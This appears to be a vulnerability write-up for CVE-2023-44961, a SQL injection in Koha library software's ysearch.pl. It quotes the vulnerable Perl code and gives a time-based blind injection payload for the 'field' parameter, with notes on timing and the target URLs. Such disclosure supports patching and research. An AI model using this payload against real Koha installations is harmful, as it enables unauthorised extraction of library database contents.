/CVE-2023-44961

PoC for CVE-2023-44961

Primary LanguagePython

CVE-2023-44961

PoC for CVE-2023-44961

Description

This is a SQL Injection vulnerability in Koha Library Software v.23.0.5.04 and before version which allows a remote attacker to obtain arbitrary data from the koha sql server.

Analysis

This vulnerability appears in the intranet/cgi bin/cataloging/ysearch.pl file of the intranet interface:

...
my $query = $input->param('term');
my $table = $input->param('table');
my $field = $input->param('field');

# Prevent from disclosing data
die() unless ($table eq "biblioitems"); 

...

my $dbh = C4::Context->dbh;
my $sql = qq(SELECT distinct $field
             FROM $table 
             WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ?);
$sql .= qq( ORDER BY $field);
my $sth = $dbh->prepare($sql);
$sth->execute("$query%", "% $query%", "%-$query%");
...

When concatenating SQL statements with the $sql variable in the code, keyword filtering was not performed. We can achieve time-based SQL blind injection by injecting the following payload:

$field = 1 and if((substr(database(),1,1)='k'), sleep(1), sleep(0))

The sql command after concatenation is:

SELECT distinct 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) FROM biblioitems WHERE 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" OR 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" or 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" ORDER BY 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0))

Since SELECT distinct $field FROM $table WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ? is used to return the values of all the $field fields in the $table that meet one of the three LIKE conditions, it will traverse each row of data in the $table.

Therefore, if you want to reduce the sleep time, set the sleep time to 1/n (n represents the number of rows of data in the $table), that is, sleep (1/n).

PoC

To trigger the SQL injection vulnerability here, first ensure that there is data in the biblioitems table. We can add data through the following URL:

http://koha_ip:intranet_port/cgi-bin/koha/cataloguing/addbiblio.pl

I have added a piece of data here:

Test our SQL statements on the command line:

It can be seen that in the biblioitems table, with one piece of data, the sleep is set to 1 second, and the actual sleep time is 3 seconds.

Following this approach, a PoC can be constructed for testing:

Access the following url to trigger:

http://koha_ip:intranet_port/cgi-bin/koha/cataloguing/ysearch.pl

As shown in the figure my database name is koha_mykoha.